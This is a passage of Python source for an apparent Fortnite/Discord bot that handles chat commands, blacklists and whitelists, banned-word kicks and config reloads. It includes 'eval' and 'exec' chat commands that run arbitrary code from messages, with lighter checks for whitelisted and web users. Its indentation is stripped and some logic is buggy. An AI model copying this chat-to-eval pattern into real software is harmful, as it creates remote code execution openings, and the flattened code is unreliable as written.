await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(message, AllMessage):
client = message.client
if data['discord']['enabled'] and not dclient.isready:
return
if (len(con) > 1
and not (args[0] in commands['eval'])
and not (args[0] in commands['exec'])):
tasks = []
for c in con:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
tasks.append([task,mes])
await asyncio.gather(*[task[0] for task in tasks])
for mes in [task[1] for task in tasks]:
result = mes.result.get(client.user.id)
if result:
await reply(message, client, '\n'.join(result))
return
base = message.base
while isinstance(base, AllMessage):
base = base.base
if isinstance(base, fortnitepy.message.MessageBase):
client.add_cache(message.author)
if ((message.author.id in blacklist and data['fortnite']['blacklist-ignorecommand'])
or (message.author.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['ignorebot'])):
return
if isinstance(base, fortnitepy.FriendMessage):
if not client.whisper:
if client.whisperperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}]',content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
elif isinstance(base, fortnitepy.PartyMessage):
if not client.partychat:
if client.partychatperfect:
return
elif message.author.id not in [owner.id for owner in client.owner] and message.author.id not in whitelist:
return
display_name = client.is_most()
if display_name:
if data['loglevel'] == 'normal':
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{l("party")}] [{display_name}] {x}')
else:
send(f'{name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}]',content,add_p=lambda x:f'[{now()}] [{l("party")}/{client.party.id}] [{display_name}] {name(message.author)} [{platform_to_str(message.author.platform)}/{message.author.input}] | {x}',add_d=lambda x:f'[{l("party")}/{client.party.id}] [{display_name}] {x}')
if rawcontent in commands['me']:
rawcontent = message.author.id
content_ = message.author.id
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in client.owner])
or (message.author.id in whitelist and data['fortnite']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, discord.message.Message):
if ((message.author.id == dclient.user.id)
or (message.author.id in blacklist_ and data['discord']['blacklist-ignorecommand'])
or (message.author.bot and data['discord']['ignorebot'])):
return
if not client.discord:
if client.discordperfect:
return
elif message.author.id not in [owner.id for owner in dclient.owner] and message.author.id not in whitelist_:
return
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}({dclient.user})] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}({dclient.user})] {x}')
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
check_ownercommand = False
if ((message.author.id in [owner.id for owner in dclient.owner])
or (message.author.id in whitelist_ and data['discord']['whitelist-ignoreng'])):
check_ng = False
elif isinstance(base, WebMessage):
if ((data['discord']['enabled'] and not dclient.isready)
or (not client.web)):
return
check_ownercommand = False
check_ng = False
send(name(message.author),content,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {name(message.author)} | {x}',add_d=lambda x:f'[{client.user.display_name}] {x}')
if not client.isready:
return
display_name = name(client.user)
do_itemsearch = True
if check_ownercommand:
for command in commands['ownercommands']:
if command in ("cid_", "bid_", "petcarrier_", "pickaxe_id_", "eid_", "emoji_", "toy_"):
if args[0].startswith(command):
await reply(message, client, l("this_command_owneronly"))
return
elif command == "item-search":
do_itemsearch = False
elif args[0] in commands[command]:
await reply(message, client, l("this_command_owneronly"))
return
reply_flag = False
for key,value in replies.items():
reply_flag_ = False
if data["replies-matchmethod"] == "contains":
if [k for k in key.split(',') if k in content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "full":
if [k for k in key.split(',') if k == content]:
reply_flag_ = True
elif data["replies-matchmethod"] == "starts":
if [k for k in key.split(',') if content.startswith(k)]:
reply_flag_ = True
elif data["replies-matchmethod"] == "ends":
if [k for k in key.split(',') if content.endswith(k)]:
reply_flag_ = True
if reply_flag_:
reply_flag = True
var = defaultdict(lambda: None)
var.update(client.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"author_display_name": message.author.display_name,
"author_id": message.author.id
}
)
mes = eval_format(value,var)
await reply(message, client, mes)
if check_ng:
flag = False
if data["ng-word-matchmethod"] == "contains":
if [ng for ng in data["ng-words"] if ng in content]:
flag = True
elif data["ng-word-matchmethod"] == "full":
if [ng for ng in data["ng-words"] if ng == content]:
flag = True
elif data["ng-word-matchmethod"] == "starts":
if [ng for ng in data["ng-words"] if content.startswith(ng)]:
flag = True
elif data["ng-word-matchmethod"] == "ends":
if [ng for ng in data["ng-words"] if content.endswith(ng)]:
flag = True
if flag:
if data["ng-word-blacklist"]:
if isinstance(message, fortnitepy.message.MessageBase):
blacklist.append(message.author.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
elif isinstance(message, discord.Message):
blacklist_.append(message.author.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(message.author.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
member = client.party.get_member(message.author.id)
if member and client.party.me.leader:
if data["ng-word-kick"]:
try:
await member.kick()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif data["ng-word-chatban"]:
try:
await member.chatban()
except Exception as e:
if data["loglevel"] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
return
if reply_flag:
return
if args[0] in commands['prev']:
c = client.prevmessage.get(message.author.id)
if c:
mes = AllMessage(c, message.author, client, message)
task = loop.create_task(process_command(mes))
await task
result = mes.result
if result:
await reply(message, client, '\n'.join(result))
return
client.prevmessage[message.author.id] = content
if args[0] in commands['eval']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['eval']}] [{l('eval')}]")
return
variable = globals()
variable.update(locals())
if rawcontent.startswith("await "):
if data['loglevel'] == "debug":
send(display_name,f"await eval({rawcontent.replace('await ','',1)})",yellow,add_d=lambda x:f'```\n{x}\n```')
result = await eval(rawcontent.replace("await ","",1), variable)
send(display_name,str(result))
await reply(message, client, str(result))
else:
if data['loglevel'] == "debug":
send(display_name,f"eval {rawcontent}",yellow,add_d=lambda x:f'```\n{x}\n```')
result = eval(rawcontent, variable)
send(display_name,str(result))
await reply(message, client, str(result))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
elif args[0] in commands['exec']:
try:
if rawcontent == "":
await reply(message, client, f"[{commands['exec']}] [{l('exec')}]")
return
variable = globals()
variable.update(locals())
result = await aexec(content.replace(f"{args[0]} ","",1), variable)
await reply(message, client, str(result))
except Exception as e:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"{l('error')}\n{traceback.format_exc()}")
if data['discord']['enabled']:
if args[0] in commands['addblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in blacklist_:
blacklist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('discord_blacklist')),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removeblacklist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in blacklist_:
blacklist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["blacklist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', f'{name(user)}', l('discord_blacklist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_blacklist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l('user_notfound'),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,traceback.format_exc(),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['addwhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id not in whitelist_:
whitelist_.append(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].append(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_from_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removewhitelist_discord']:
try:
if rawcontent == '' or not args[1].isdigit():
await reply(message, client, f"[{commands['removewhitelist_discord']}] [{l('userid')}]")
return
user = dclient.get_user(int(args[1]))
if not user:
user = await dclient.fetch_user(int(args[1]))
if user.id in whitelist_:
whitelist_.remove(user.id)
data_ = load_json("config.json")
data_["discord"]["whitelist"].remove(user.id)
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', f'{name(user)}', l('discord_whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_list', f'{name(user)}', l('discord_whitelist')))
else:
await reply(message, client, l('not_list', f'{name(user)}', l('discord_whitelist')))
except discord.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
if args[0] in commands['restart']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('restarting'))
Thread(target=restart,args=(0.5,)).start()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['relogin']:
try:
if client.acceptinvite is False:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
await reply(message, client, l('relogining'))
await client.restart()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['reload']:
success = load_config(client)
try:
if success:
await reply(message, client, l('success'))
else:
await reply(message, client, l('error'))
return
try:
if data['fortnite']['avatar_id'] == "{bot}":
client.set_avatar(fortnitepy.Avatar(asset=client.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
client.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=client.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(client.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
client.owner = []
for owner in data['fortnite']['owner']:
user = client.get_user(owner) or client.get_cache_user(owner)
if not user:
try:
user = await client.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id):
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
client.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if client.owner and data['fortnite']['click_invite']:
for owner in client.owner:
await owner.send(l("click_invite"))
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = client.get_user(mimic) or client.get_cache_user(mimic)
if not user:
try:
user = await client.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
setattr(client,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(client,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def _(listuser: str) -> None:
user = client.get_user(listuser) or client.get_cache_user(listuser)
if not user:
try:
user = await client.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.add_cache(user)
friend = client.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not client.is_pending(user.id) and user.id != client.user.id:
try:
await client.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
client.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {client.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if client.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif client.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled'] and dclient.isready:
dclient_user = name(dclient.user)
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(name).lower()) and user.id != client.user.id and user.id not in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(name) and user.id != client.user.id and user.id not in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', len(users)))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_in_list', f'{name(user)}', l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_in_list', f'{name(user)}', l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in blacklist}
try:
user = await client.fetch_user(rawcontent)
if not user:
if user.id in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addwhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
